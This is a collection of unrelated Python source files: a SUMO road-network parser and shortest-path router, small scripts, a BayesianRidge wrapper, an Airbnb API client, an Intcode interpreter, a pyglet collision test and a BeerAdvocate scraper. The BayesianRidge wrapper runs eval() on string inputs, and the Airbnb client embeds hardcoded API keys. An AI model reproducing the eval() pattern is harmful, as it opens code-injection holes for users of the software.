maxCost=1e400, vClass=None, reversalPenalty=0, includeFromToCost=True, withInternal=False, ignoreDirection=False, fromPos=0, toPos=0): """ Finds the optimal (shortest or fastest) path for vClass from fromEdge to toEdge by using using Dijkstra's algorithm. It returns a pair of a tuple of edges and the cost. If no path is found the first element is None. The cost for the returned path is equal to the sum of all edge costs in the path, including the internal connectors, if they are present in the network. The path itself does not include internal edges except for the case when the start or end edge are internal edges. The search may be limited using the given threshold. """ def speedFunc(edge): return edge.getSpeed() if fastest else 1.0 if self.hasInternal: appendix = () appendixCost = 0. while toEdge.getFunction() == "internal": appendix = (toEdge,) + appendix appendixCost += toEdge.getLength() / speedFunc(toEdge) toEdge = list(toEdge.getIncoming().keys())[0] fromCost = fromEdge.getLength() / speedFunc(fromEdge) if includeFromToCost else 0 q = [(fromCost, fromEdge.getID(), (fromEdge, ), ())] if fromEdge == toEdge and fromPos > toPos and not ignoreDirection: # start search on successors of fromEdge q = [] startCost = (fromEdge.getLength() - fromPos) / speedFunc(fromEdge) if includeFromToCost else 0 for e2, conn in fromEdge.getAllowedOutgoing(vClass).items(): q.append((startCost + e2.getLength() / speedFunc(e2), e2.getID(), (fromEdge, e2), ())) seen = set() dist = {fromEdge: fromEdge.getLength() / speedFunc(fromEdge)} while q: cost, _, e1via, path = heapq.heappop(q) e1 = e1via[-1] if e1 in seen: continue seen.add(e1) path += e1via if e1 == toEdge: if self.hasInternal: return path + appendix, cost + appendixCost if includeFromToCost and toPos == 0: # assume toPos=0 is the default value return path, cost return path, cost + (-toEdge.getLength() + toPos) / speedFunc(toEdge) if cost > maxCost: return None, cost for e2, conn in chain(e1.getAllowedOutgoing(vClass).items(), e1.getIncoming().items() if ignoreDirection else []): # print(cost, e1.getID(), e2.getID(), e2 in seen) if e2 not in seen: newCost = cost + e2.getLength() / speedFunc(e2) if e2 == e1.getBidi(): newCost += reversalPenalty minPath = (e2,) if self.hasInternal: viaPath, minInternalCost = self.getInternalPath(conn, fastest=fastest) if viaPath is not None: newCost += minInternalCost if withInternal: minPath = tuple(viaPath + [e2]) if e2 not in dist or newCost < dist[e2]: dist[e2] = newCost heapq.heappush(q, (newCost, e2.getID(), minPath, path)) return None, 1e400 def getShortestPath(self, fromEdge, toEdge, maxCost=1e400, vClass=None, reversalPenalty=0, includeFromToCost=True, withInternal=False, ignoreDirection=False, fromPos=0, toPos=0): """ Finds the shortest path from fromEdge to toEdge respecting vClass, using Dijkstra's algorithm. It returns a pair of a tuple of edges and the cost. If no path is found the first element is None. The cost for the returned path is equal to the sum of all edge lengths in the path, including the internal connectors, if they are present in the network. The path itself does not include internal edges except for the case when the start or end edge are internal edges. The search may be limited using the given threshold. """ return self.getOptimalPath(fromEdge, toEdge, False, maxCost, vClass, reversalPenalty, includeFromToCost, withInternal, ignoreDirection, fromPos, toPos) def getFastestPath(self, fromEdge, toEdge, maxCost=1e400, vClass=None, reversalPenalty=0, includeFromToCost=True, withInternal=False, ignoreDirection=False, fromPos=0, toPos=0): """ Finds the fastest path from fromEdge to toEdge respecting vClass, using Dijkstra's algorithm. It returns a pair of a tuple of edges and the cost. If no path is found the first element is None. The cost for the returned path is equal to the sum of all edge costs in the path, including the internal connectors, if they are present in the network. The path itself does not include internal edges except for the case when the start or end edge are internal edges. The search may be limited using the given threshold. """ return self.getOptimalPath(fromEdge, toEdge, True, maxCost, vClass, reversalPenalty, includeFromToCost, withInternal, ignoreDirection, fromPos, toPos) class NetReader(handler.ContentHandler): """Reads a network, storing the edge geometries, lane numbers and max. speeds""" def __init__(self, **others): self._net = others.get('net', Net()) self._currentEdge = None self._currentNode = None self._currentConnection = None self._currentLane = None self._crossingID2edgeIDs = {} self._withPhases = others.get('withPrograms', False) self._latestProgram = others.get('withLatestPrograms', False) if self._latestProgram: self._withPhases = True self._withConnections = others.get('withConnections', True) self._withFoes = others.get('withFoes', True) self._withPedestrianConnections = others.get('withPedestrianConnections', False) self._withMacroConnectors = others.get('withMacroConnectors', False) self._withInternal = others.get('withInternal', self._withPedestrianConnections) if self._withPedestrianConnections and not self._withInternal: sys.stderr.write("Warning: Option withPedestrianConnections requires withInternal\n") self._withInternal = True self._bidiEdgeIDs = {} def startElement(self, name, attrs): if name == 'location': self._net.setLocation(attrs["netOffset"], attrs["convBoundary"], attrs[ "origBoundary"], attrs["projParameter"]) if name == 'edge': function = attrs.get('function', '') if (function == '' or (self._withInternal and function in ['internal', 'crossing', 'walkingarea']) or (self._withMacroConnectors and function == 'connector')): prio = -1 if 'priority' in attrs: prio = int(attrs['priority']) # get the ids edgeID = attrs['id'] fromNodeID = attrs.get('from', None) toNodeID = attrs.get('to', None) # for internal junctions use the junction's id for from and to node if function == 'internal': fromNodeID = toNodeID = edgeID[1:edgeID.rfind('_')] # remember edges crossed by pedestrians to link them later to the crossing objects if function == 'crossing': self._crossingID2edgeIDs[edgeID] = attrs.get('crossingEdges').split(' ') self._currentEdge = self._net.addEdge(edgeID, fromNodeID, toNodeID, prio, function, attrs.get('name', ''), attrs.get('type', '')) self._currentEdge.setRawShape(convertShape(attrs.get('shape', ''))) bidi = attrs.get('bidi', '') if bidi: self._bidiEdgeIDs[edgeID] = bidi else: if function in ['crossing', 'walkingarea']: self._net._crossings_and_walkingAreas.add(attrs['id']) elif function == 'connector': self._net._macroConnectors.add(attrs['id']) self._currentEdge = None if name == 'lane' and self._currentEdge is not None: self._currentLane = self._net.addLane( self._currentEdge, float(attrs['speed']), float(attrs['length']), float(attrs.get('width', 3.2)), attrs.get('allow'), attrs.get('disallow')) self._currentLane.setShape(convertShape(attrs.get('shape', ''))) if name == 'neigh' and self._currentLane is not None: self._currentLane.setNeigh(attrs['lane']) if name == 'junction': if attrs['id'][0] != ':': intLanes = None if self._withInternal: intLanes = attrs["intLanes"].split(" ") self._currentNode = self._net.addNode(attrs['id'], attrs['type'], tuple( map(float, [attrs['x'], attrs['y'], attrs['z'] if 'z' in attrs else '0'])), attrs['incLanes'].split(" "), intLanes) self._currentNode.setShape( convertShape(attrs.get('shape', ''))) if 'fringe' in attrs: self._currentNode._fringe = attrs['fringe'] if name == 'succ' and self._withConnections: # deprecated if attrs['edge'][0] != ':': self._currentEdge = self._net.getEdge(attrs['edge']) self._currentLane = attrs['lane'] self._currentLane = int( self._currentLane[self._currentLane.rfind('_') + 1:]) else: self._currentEdge = None if name == 'succlane' and self._withConnections: # deprecated lid = attrs['lane'] if lid[0] != ':' and lid != "SUMO_NO_DESTINATION" and self._currentEdge: connected = self._net.getEdge(lid[:lid.rfind('_')]) tolane = int(lid[lid.rfind('_') + 1:]) if 'tl' in attrs and attrs['tl'] != "": tl = attrs['tl'] tllink = int(attrs['linkIdx']) tlid = attrs['tl'] toEdge = self._net.getEdge(lid[:lid.rfind('_')]) tolane2 = toEdge._lanes[tolane] tls = self._net.addTLS( tlid, self._currentEdge._lanes[self._currentLane], tolane2, tllink) self._currentEdge.setTLS(tls) else: tl = "" tllink = -1 toEdge = self._net.getEdge(lid[:lid.rfind('_')]) tolane = toEdge._lanes[tolane] viaLaneID = attrs['via'] self._net.addConnection(self._currentEdge, connected, self._currentEdge._lanes[ self._currentLane], tolane, attrs['dir'], tl, tllink, attrs['state'], viaLaneID) if name == 'connection' and self._withConnections and (attrs['from'][0] != ":" or self._withInternal): fromEdgeID = attrs['from'] toEdgeID = attrs['to'] if ((self._withPedestrianConnections or not (fromEdgeID in self._net._crossings_and_walkingAreas or toEdgeID in self._net._crossings_and_walkingAreas)) and (self._withMacroConnectors or not (fromEdgeID in self._net._macroConnectors or toEdgeID in self._net._macroConnectors))): fromEdge = self._net.getEdge(fromEdgeID) toEdge = self._net.getEdge(toEdgeID) fromLane = fromEdge.getLane(int(attrs['fromLane'])) toLane = toEdge.getLane(int(attrs['toLane'])) if 'tl' in attrs and attrs['tl'] != "": tl = attrs['tl'] tllink = int(attrs['linkIndex']) tls = self._net.addTLS(tl, fromLane, toLane, tllink) fromEdge.setTLS(tls) else: tl = "" tllink = -1 try: viaLaneID = attrs['via'] except KeyError: viaLaneID = '' self._currentConnection = self._net.addConnection( fromEdge, toEdge, fromLane, toLane, attrs['dir'], tl, tllink, attrs['state'], viaLaneID) # 'row-logic' is deprecated!!! if self._withFoes and name == 'ROWLogic': self._currentNode = attrs['id'] if name == 'logicitem' and self._withFoes: # deprecated self._net.setFoes( self._currentNode, int(attrs['request']), attrs["foes"], attrs["response"]) if name == 'request' and self._withFoes: self._currentNode.setFoes( int(attrs['index']), attrs["foes"], attrs["response"]) # tl-logic is deprecated!!! NOTE: nevertheless, this is still used by # netconvert... (Leo) if self._withPhases and name == 'tlLogic': self._currentProgram = self._net.addTLSProgram( attrs['id'], attrs['programID'], float(attrs['offset']), attrs['type'], self._latestProgram) if self._withPhases and name == 'phase': self._currentProgram.addPhase( attrs['state'], int(attrs['duration']), int(attrs['minDur']) if 'minDur' in attrs else -1, int(attrs['maxDur']) if 'maxDur' in attrs else -1, list(map(int, attrs['next'].split())) if 'next' in attrs else [], attrs['name'] if 'name' in attrs else "" ) if name == 'roundabout': self._net.addRoundabout( attrs['nodes'].split(), attrs['edges'].split()) if name == 'param': if self._currentLane is not None: self._currentLane.setParam(attrs['key'], attrs['value']) elif self._currentEdge is not None: self._currentEdge.setParam(attrs['key'], attrs['value']) elif self._currentNode is not None: self._currentNode.setParam(attrs['key'], attrs['value']) elif self._currentConnection is not None: self._currentConnection.setParam(attrs['key'], attrs['value']) elif self._withPhases and self._currentProgram is not None: self._currentProgram.setParam(attrs['key'], attrs['value']) def endElement(self, name): if name == 'lane': self._currentLane = None if name == 'edge': self._currentEdge = None if name == 'junction': self._currentNode = None if name == 'connection': self._currentConnection = None # 'row-logic' is deprecated!!! if name == 'ROWLogic' or name == 'row-logic': self._haveROWLogic = False # tl-logic is deprecated!!! if self._withPhases and (name == 'tlLogic' or name == 'tl-logic'): self._currentProgram = None if name == 'net': for edgeID, bidiID in self._bidiEdgeIDs.items(): self._net.getEdge(edgeID)._bidi = self._net.getEdge(bidiID) def endDocument(self): # set crossed edges of pedestrian crossings for crossingID, crossedEdgeIDs in self._crossingID2edgeIDs.items(): pedCrossing = self._net.getEdge(crossingID) for crossedEdgeID in crossedEdgeIDs: pedCrossing._addCrossingEdge(self._net.getEdge(crossedEdgeID)) def getNet(self): return self._net def convertShape(shapeString): """ Convert xml shape string into float tuples. This method converts the 2d or 3d shape string from SUMO's xml file into a list containing 3d float-tuples. Non existant z coordinates default to zero. If shapeString is empty, an empty list will be returned. """ cshape = [] for pointString in shapeString.split(): p = [float(e) for e in pointString.split(",")] if len(p) == 2: cshape.append((p[0], p[1], 0.)) elif len(p) == 3: cshape.append(tuple(p)) else: raise ValueError( 'Invalid shape point "%s", should be either 2d or 3d' % pointString) return cshape def readNet(filename, **others): """ load a .net.xml file The following named options are supported: 'net' : initialize data structurs with an existing net object (default Net()) 'withPrograms' : import all traffic light programs (default False) 'withLatestPrograms' : import only the last program for each traffic light. This is the program that would be active in sumo by default. (default False) 'withConnections' : import all connections (default True) 'withFoes' : import right-of-way information (default True) 'withInternal' : import internal edges and lanes (default False) 'withPedestrianConnections' : import connections between sidewalks, crossings (default False) """ netreader = NetReader(**others) try: parse(gzip.open(filename), netreader) except IOError: parse(filename, netreader) return netreader.getNet()
ngctnnnn/DRL_Traffic-Signal-Control
sumo-rl/sumo/tools/sumolib/net/__init__.py
__init__.py
py
35,544
python
en
code
17
github-code
6
72345890107
data = [] count = 0 with open ('reviews.txt', 'r') as f: for line in f: data.append(line) count += 1 if count % 1000 == 0: print(len(data)) print('Files finished reading, we have total', len(data), 'reviews') sum_len = 0 for d in data: sum_len = sum_len + len(d) print('The average number of the reviews', sum_len/len(data))
bealeebrandt/reviews-analytics
read.py
read.py
py
373
python
en
code
0
github-code
6
27009702338
import numpy as np import run as r ''' [id] 115 [name] BayesianRidge [input] x_train 训练集 训练集标签数据集 二维数组 必须 定数 y_train 测试集 测试集数据集 二维数组 必须 定数 x_test 训练集标签 训练集标签标签 一维数组 必须 定数 y_test 测试集标签 测试集标签 一维数组 必须 定数 n_iter n_iter 默认为300,最大迭代次数。应该大于或等于1,可选整数 整数 不必须 定数 tol tol 默认为1e-3,如果w收敛,则停止算法,可选浮点数 浮点数 不必须 定数 alpha_1 alpha_1 默认为1e-6,Hyper-parameter:shape参数,用于先于Alpha参数的Gamma分布,可选浮点数 浮点数 不必须 定数 alpha_2 alpha_2 默认为1e-6,超参数:Gamma分布优先于alpha参数的反比例参数(速率参数),可选浮点数 浮点数 不必须 定数 lambda_1 lambda_1 默认为1e-6,Hyper-parameter:shape参数,用于先于lambda参数的Gamma分布,可选浮点数 浮点数 不必须 定数 lambda_2 lambda_2 默认为1e-6,超参数:Gamma分布先于lambda参数的反比例参数(速率参数),可选浮点数 浮点数 不必须 定数 alpha_init alpha_init 默认为None,alpha的初始值(噪声的精度)。如果未设置,则alpha_init为1/Var(y),可选浮点数 浮点数 不必须 定数 lambda_init lambda_init 默认为None,Lambda的初始值(权重的精度)。如果未设置,则lambda_init为1。..版本添加::0.22,可选浮点数 浮点数 不必须 定数 compute_score compute_score 默认为False,如果为True,则在每次优化迭代时计算对数边际可能性,可选布尔值 布尔值 不必须 定数 fit_intercept 计算截距 默认为True,是否计算此模型的截距。截距不被视为概率参数,因此没有关联的方差。如果将其设置为False,则在计算中将不使用截距(即,数据应居中),可选整数,布尔值 字符串 不必须 定数 normalize 归一化 默认为False,当fit_intercept设置为False时,将忽略此参数。如果为True,则将在回归之前通过减去均值并除以l2-范数来对回归变量X进行归一化,可选布尔值 布尔值 不必须 定数 copy_X 是否复制 默认为True,如果为True,将复制X;否则为X。否则,它可能会被覆盖,可选布尔值 布尔值 不必须 定数 verbose 详细程度 默认为False,拟合模型时为详细模式,可选布尔值 布尔值 不必须 定数 [output] train_predict 预测 训练集预测结果 一维数组(数值) test_predict 预测 测试集预测结果 一维数组(数值) train_score 正确率 训练集预测结果的正确率 数字 test_score 正确率 测试集预测结果的正确率 数字 coef_ 参数向量 回归模型的系数(均值) 一维数组 intercept_ 截距 决策特征中的独立术语。如果fit_intercept=False,则设置为0.0 整数 alpha_ alpha 估计的噪声精度 浮点数 lambda_ lambda_ 估计重量的精度 浮点数 sigma_ sigma_ 权重的估计方差-协方差矩阵 二维数组 scores_ scores_ 如果calculated_score为True,则在每次优化迭代时对数边际似然值(要最大化)。该数组以从alpha和lambda的初始值获得的对数边际似然值开始,以以估计的alpha和lambda的值结束 一维数组 n_iter_ 迭代次数 达到停止标准的实际迭代次数 整数 [outline] 贝叶斯岭回归。 [describe] 贝叶斯岭回归。 拟合贝叶斯岭模型。 有关详细信息,请参见注释部分。 正则化参数的实现和优化lambda(权重的精度)和alpha(噪声的精度) ''' def main(x_train, y_train, x_test, y_test, n_iter=300, tol=1.e-3, alpha_1=1.e-6, alpha_2=1.e-6, lambda_1=1.e-6, lambda_2=1.e-6, alpha_init=None, lambda_init=None, compute_score=False, fit_intercept=True, normalize=False, copy_X=True, verbose=False ): if type(x_train) is str: x_train = eval(x_train) if type(y_train) is str: y_train = eval(y_train) if type(x_test) is str: x_test = eval(x_test) if type(y_test) is str: y_test = eval(y_test) if type(n_iter) is str: n_iter = eval(n_iter) if type(tol) is str: tol = eval(tol) if type(alpha_1) is str: alpha_1 = eval(alpha_1) if type(alpha_2) is str: alpha_2 = eval(alpha_2) if type(lambda_1) is str: lambda_1 = eval(lambda_1) if type(lambda_2) is str: lambda_2 = eval(lambda_2) if type(alpha_init) is str: alpha_init = eval(alpha_init) if type(lambda_init) is str: lambda_init = eval(lambda_init) if type(compute_score) is str: compute_score = eval(compute_score) if type(fit_intercept) is str: fit_intercept = eval(fit_intercept) if type(normalize) is str: normalize = eval(normalize) if type(copy_X) is str: copy_X = eval(copy_X) if type(verbose) is str: verbose = eval(verbose) return r.run(x_train=x_train, y_train=y_train, x_test=x_test, y_test=y_test, n_iter=n_iter, tol=tol, alpha_1=alpha_1, alpha_2=alpha_2, lambda_1=lambda_1, lambda_2=lambda_2, alpha_init=alpha_init, lambda_init=lambda_init, compute_score=compute_score, fit_intercept=fit_intercept, normalize=normalize, copy_X=copy_X, verbose=verbose) if __name__ == '__main__': import numpy as np import json array = np.loadtxt('D:\\123_2.csv', delimiter=',') array = array[0:20, :] y = array[:, -1].tolist() x = np.delete(array, -1, axis=1).tolist() array = array.tolist() back = main(x, y, x, y) print(back) for i in back: print(i + ":" + str(back[i])) json.dumps(back)
lisunshine1234/mlp-algorithm-python
machine_learning/regression/linear_models/BayesianRidge/main.py
main.py
py
5,830
python
zh
code
0
github-code
6
38696958854
# coding=utf-8 import requests class Airbnb(object): """Interface to get data from airbnb api. You can use : api_instance = Airbnb() api_instance.get_logement("Paris") api_instance.get_review(logement_id) api_instance.get_logement_details(logement_id)""" def get_user_infos(self, user_id): url = "https://api.airbnb.com/v2/users/%s?" % user_id params = { "client_id" : "3092nxybyb0otqw18e8nh5nty", "_format" : "v1_legacy_show", "locale" : "en-Us", "currency" : "USD" } response = requests.get(url, params=params) if response.status_code != 200: return response.status_code return response.content def get_logement_details(self, logement_id): try: url = "https://api.airbnb.com/v2/listings/" + logement_id except TypeError: #in case logement_id input is an integer. url = "https://api.airbnb.com/v2/listings/" + str(logement_id) params = { "client_id" : "3092nxybyb0otqw18e8nh5nty", # compulsory : API KEY "_format" : "v1_legacy_for_p3", # compulsory "locale" : "en-US", # optionnal from here. "currency" : "USD", "_source" : "mobile_p3", "number_of_guests" : "1" } response = requests.get(url, params=params) if response.status_code != 200: return response.status_code return response.content def get_review(self, logement_id, offset): url = "https://api.airbnb.com/v2/reviews" params = { "client_id" : "d306zoyjsyarp7ifhu67rjxn52tv0t20", "locale" : "en-US", "currency" : "USD", "_format" : "for_mobile_client", "_limit" : "50", "_offset" : offset, "_order" : "language", "listing_id" : logement_id, "role" : "all" } response = requests.get(url, params=params) if response.status_code != 200: print("response status code : %s" % response.status_code) return response.status_code return response.content def get_logement(self, city, checkin, checkout, offset): """With this function you can get lots of infos (especially the housing ID), then get data about reviews or details of it. The method take a city name (string) as input and return a utf-8 encoded json string you can easily parse with json.loads() or a HTTP status code if an error occured.""" url = "https://api.airbnb.com/v2/search_results" key1 = "3092nxybyb0otqw18e8nh5nty" key2 = "d306zoyjsyarp7ifhu67rjxn52tv0t20" params = { "client_id" : key2, "locale" : "en-US", "currency" : "USD", "_limit" : "50", "_format" : "for_search_results_with_minimal_pricing", "_offset" : offset, "fetch_facets" : "true", "guests" : "1", "ib" : "false", "ib_add_photo_flow" : "true", "location" : city, "min_bathrooms" : "0", "min_bedrooms" : "0", "min_beds" : "1", "min_num_pic_urls" : "0", "price_max" : "5000", "price_min" : "0", "checkin" : checkin, "checkout" : checkout, "sort" : "1", "user_lat" : "37.3398634", "user_lng" : "-122.0455164" } response = requests.get(url, params=params) if response.status_code != 200: return response.status_code return response.content def get_available(self, logement_id, month, year, count): """Endpoint to get all availability for a precise listing. We neede as input the listting id, month and year to begin from and count as number of months to get result from. It returns utf-8 encoded json string to parse with json.loads() or an HTTP status code if the request failed.""" url = "https://www.airbnb.fr/api/v2/calendar_months" params = { "key" : "d306zoyjsyarp7ifhu67rjxn52tv0t20", "currency" : "EUR", "locale" : "fr", "listing_id" : logement_id, "month" : month, "year" : year, "count" : count, "_format" : "with_conditions" } response = requests.get(url, params=params) if response.status_code != 200: return response.status_code return response.content def get_logement_by_gps(self, ne_lat, ne_lng, sw_lat, sw_lng, zoom, page_number, checkin=None, checkout=None): url = "https://www.airbnb.fr/api/v2/explore_tabs" params = { "items_per_grid" : "18", "key" : "d306zoyjsyarp7ifhu67rjxn52tv0t20", "ne_lat" : ne_lat, "ne_lng" : ne_lng, "sw_lat" : sw_lat, "sw_lng" : sw_lng, "zoom" : zoom, "location" : "paris", "search_by_map" : "true", "_format" : "for_explore_search_web", "experiences_per_grid" : "20", "guidebooks_per_gri" : "=20", "fetch_filters" : "true", "supports_for_you_v3" : "true", "screen_size" : "large", "timezone_offset" : "120", "auto_ib" : "true", "tab_id" : "home_tab", "federated_search_session_id" : "87339300-cc93-4d01-b366-dc3896f7788b", "_intents" : "p1", "currency" : "EUR", "locale" : "fr", "section_offset" : page_number - 1 } if checkin and checkout: params['checkin'] = checkin params['checkout'] = checkout response = requests.get(url, params=params) if response.status_code != 200: return response.status_code return response.content if __name__ == '__main__': # get_review("17834617") airbnb = Airbnb() print(airbnb.get_logement_by_gps(48.8632953507299, 2.3455012817150873, 48.86068875819463, 2.3429478187329096, 18, 2)) # print(airbnb.get_available(17834617, 5, 2017, 4)) # print(airbnb.get_logement_details(17834617)) # airbnb.get_logement("Bordeaux", 1, 2)
pablo-a/airbnb
airbnb_api.py
airbnb_api.py
py
6,552
python
en
code
1
github-code
6
3200862039
def getOpCode(i): return int(str(i)[-2:]) def getParaModes(i): modes = list(map(lambda x: int(x), str(i)[:-2])) while len(modes) < 2: modes.insert(0,0) return modes def getOperand(program, addr, mode): operand = None try: operand = program[addr] if mode == 1 else program[program[addr]] except IndexError: pass return operand def execute(program): pc = 0 while True: op_code = getOpCode(program[pc]) modes = getParaModes(program[pc]) op1 = getOperand(program, pc + 1, modes[-1]) op2 = getOperand(program, pc + 2, modes[-2]) if op_code == 99: return # Add if op_code == 1: program[program[pc + 3]] = op1 + op2 pc += 4 continue # Multiply if op_code == 2: program[program[pc + 3]] = op1 * op2 pc += 4 continue # Input if op_code == 3: x = input('Input a single integer: ') program[program[pc + 1]] = int(x) pc += 2 continue # Output if op_code == 4: print(op1) pc += 2 continue # Jump if true if op_code == 5: if op1 != 0: pc = op2 else: pc += 3 continue # Jump if false if op_code == 6: if op1 == 0: pc = op2 else: pc += 3 continue # Less than if op_code == 7: program[program[pc + 3]] = 1 if op1 < op2 else 0 pc += 4 continue # Equals if op_code == 8: program[program[pc + 3]] = 1 if op1 == op2 else 0 pc += 4 continue def main(): with open('input.txt') as program_file: program = program_file.read().split(',') program = list(map(lambda x: int(x), program)) execute(program) if __name__ == "__main__": main()
Sebastian-/advent-of-code-2019
day05/sol.py
sol.py
py
1,784
python
en
code
0
github-code
6
73264632828
from game_objects.projectile import Projectile from game_objects.player import Player from pyglet import clock from widgets.event_window import EventWindow import pyglet import cv2 as cv import time window = EventWindow(fullscreen=True) # soul_image = pyglet.image.load('soul.png') # soul = pyglet.sprite.Sprite(soul_image) soul = Player(src='soul.png') print(soul.width, soul.height) print(window.width / 2, window.height / 2) soul.move(window.width / 2 - soul.width, window.height / 2 - soul.height) soul.scale = 1.3 print('Soul: ', soul.x, soul.y, soul.width, soul.height) soul_np = cv.imread('soul.png') projectile = Projectile(src='projectiles/dull_knife.png', speed=10, x=window.width * 0.7, y=window.height) # projectile.x = window.width / 3 # projectile.rectangle.x = projectile.x # projectile.y = window.height / 2 # projectile.rectangle.y = projectile.y projectile.point(soul.x, soul.y) @window.event def on_draw(): window.clear() projectile.draw() soul.draw() def move_forward(dt): # projectile.forward() # projectile.rotate(pi/180) if soul.check_for_collision(projectile): print('hit!', projectile.get_left_bound(), projectile.get_right_bound(), soul.get_left_bound(), ) clock.unschedule(move_forward) start = time.time() img1 = cv.imread('test_images/dull_knife.png') img1 = projectile.np # img2 = cv.imread('test_images/heart_not_overlapping_3.png') img2 = cv.imread('test_images/heart_overlapping_2.png') img1gray = cv.threshold(img1, 1, 255, cv.THRESH_BINARY) if __name__ == '__main__': pyglet.clock.schedule_interval(move_forward, 1 / 120) pyglet.app.run()
KimPalao/Headshot
collision_test.py
collision_test.py
py
1,686
python
en
code
0
github-code
6
40176582534
#import gevent.monkey #gevent.monkey.patch_all() import os import sys import time import pprint import logging import requests import grequests import threading import urllib.parse from bs4 import BeautifulSoup import db import parse logger = logging.getLogger('scraper') logger.setLevel(logging.DEBUG) SRC_DIR = os.path.dirname(os.path.realpath(__file__)) LOG_DIR = os.path.join(SRC_DIR, "..", "log") LOG_FILENAME = "scraper.log" LOG_FILEPATH = os.path.join(LOG_DIR, LOG_FILENAME) fh = logging.FileHandler(LOG_FILEPATH, mode='w') fh.setLevel(logging.ERROR) # create console handler with a higher log level ch = logging.StreamHandler() ch.setLevel(logging.INFO) formatter = logging.Formatter('%(asctime)s - %(name)s - %(funcName)s - %(lineno)d - %(levelname)s - %(message)s') fh.setFormatter(formatter) ch.setFormatter(formatter) logger.addHandler(fh) logger.addHandler(ch) # Set low so server isn't bombarded and begins to refuse. MAX_SESSIONS = 1 domain = 'https://www.beeradvocate.com/' places_rel_url = 'place/list/' places_url = urllib.parse.urljoin(domain, places_rel_url) places_params = {'start': 0, 'brewery': 'Y', 'sort': 'name'} progress = {'breweries': 0, 'beers': 0, 'errors': 0} def exception_handler(r, e): progress['errors'] += 1 logger.error("REQUEST URL: {} EXCEPTION: {}".format(r.url, e)) logger.error("{} ERRORS HAVE OCCURRED".format(progress['errors'])) def get_last_page_start(): response = requests.get(url=places_url, params=places_params) soup = BeautifulSoup(response.text, features='lxml') last_page_tag = soup.find('a', text="last") last_link = last_page_tag['href'] parsed = urllib.parse.urlparse(last_link) last_start_str = urllib.parse.parse_qs(parsed.query)['start'][0] last_start = int(last_start_str) logging.debug("get_last_page_start: last_start: {}".format(last_start)) return last_start def get_breweries(): STEP = 20 last_page_start = get_last_page_start() reqs = [] for start in range(0, last_page_start, STEP): params = places_params.copy() params['start'] = start reqs.append(grequests.get(places_url, params=params, callback=get_breweries_handler)) logger.info("STARTING THREADS to fetch brewery details.") res = grequests.map(reqs, size=MAX_SESSIONS, exception_handler=exception_handler) def get_breweries_handler(response, *args, **kwargs): soup = BeautifulSoup(response.text, features='lxml') this_page_breweries = parse.places.breweries(soup) logger.info("this_page_breweries: {}".format(pprint.pformat(this_page_breweries))) logger.info("response time (s): {}".format(response.elapsed)) db.breweries.extendleft(this_page_breweries) progress['breweries'] += len(this_page_breweries) logger.info("FETCHED: {} breweries.".format(progress['breweries'])) def get_brewery_details(paths): params = {'view': 'beers', 'show': 'all'} reqs = [] for p in paths: url = urllib.parse.urljoin(domain, p) reqs.append(grequests.get(url, params=params, callback=get_brewery_details_handler)) logger.info("STARTING THREADS to fetch brewery details.") res = grequests.map(reqs, size=MAX_SESSIONS, exception_handler=exception_handler) def get_brewery_details_handler(response, *args, **kwargs): logger.info("RESPONSE received from {}".format(response.url)) soup = BeautifulSoup(response.text, features='lxml') ############################################################################# # This is possibly redundant as all this information can be gathered in the # previous operation when the links are fetched from places list. brewery = {} brewery['id'] = parse.url.brewery_id(response.url) brewery['name'] = parse.brewery.name(soup) db.breweries.appendleft(brewery) logger.info("ADDED brewery {} to write queue.".format(pprint.pformat(brewery))) ############################################################################# this_brewery_beers = parse.brewery.beers(soup) db.beers.extendleft(this_brewery_beers) logger.info("ADDED {} beers to write queue.".format(len(this_brewery_beers))) progress['breweries'] += 1 progress['beers'] += len(this_brewery_beers) logger.info("FETCHED: {} breweries and {} beers.".format(progress['breweries'], progress['beers'])) time.sleep(1) def get_beer_details(paths): # This function is redundant when first populating tha database as all info # can be extracted from the brewery profile page (except ranking which can be # calculated from scores stored in the database. It is useful to update the # info for beers already in the database but even when updating the previous # operation of fetching the brewery has most likely been performed anyway. reqs = [] for p in paths: url = urllib.parse.urljoin(domain, p) reqs.append(grequests.get(url, allow_redirects=True, callback=get_beer_details_handler)) logger.info("STARTING THREADS to fetch beer details.") res = grequests.map(reqs, size=MAX_SESSIONS, exception_handler=exception_handler) def get_beer_details_handler(response, *args, **kwargs): print(response.status_code) print(response.url) soup = BeautifulSoup(response.text, features='lxml') print(soup) beer = {} beer['id'] = parse.url.beer_id(response.url) beer['brewery_id'] = parse.url.brewery_id(response.url) beer['name'] = parse.beer.name(soup) logger.info("name: {}".format(beer['name'])) beer['score'] = parse.beer.score(soup) logger.info("score: {}".format(beer['score'])) beer['ratings'] = parse.beer.ratings(soup) logger.info("ratings: {}".format(beer['ratings'])) beer['ranking'] = parse.beer.ranking(soup) logger.info("ranking: {}".format(beer['ranking'])) beer['style'] = parse.beer.style(soup) logger.info("style: {}".format(beer['style'])) beer['abv'] = parse.beer.abv(soup) logger.info("abv: {}".format(beer['abv'])) db.beers.appendleft(beer) logger.info("ADDED beer with ID = {} to write queue.".format(beer['id'])) def breweries(): consumer_thread = threading.Thread(target=db.consumer) consumer_thread.start() get_breweries() db.fetching_breweries = False consumer_thread.join() def brewery_details(): to_fetch = db.read_brewery_ids() logger.info("{} breweries to fetch".format(len(to_fetch))) paths = ["/beer/profile/{}/".format(b) for b in to_fetch] consumer_thread = threading.Thread(target=db.consumer) consumer_thread.start() get_brewery_details(paths) db.fetching_breweries = False consumer_thread.join() def beer_details(): to_fetch = db.read_beer_ids() logger.info("{} beers to fetch".format(len(to_fetch))) paths = ["/beer/profile/{}/{}".format(b[0], b[1]) for b in to_fetch] consumer_thread = threading.Thread(target=db.consumer) consumer_thread.start() get_beer_details(paths[0:1]) db.fetching_breweries = False consumer_thread.join() def print_usage(): print("USAGE: python3 scraper.py {breweries|brewery_details|beer_details}") if __name__ == "__main__": if len(sys.argv) < 2: print_usage() elif len(sys.argv) == 2 and sys.argv[1] == "brewery_details": brewery_details() elif len(sys.argv) == 2 and sys.argv[1] == "breweries": breweries() elif len(sys.argv) == 2 and sys.argv[1] == "beer_details": beer_details() else: print_usage()
JohnMcAninley/beer-goggles
scraper/src/scraper.py
scraper.py
py
7,113
python
en
code
0
github-code
6
41095556533
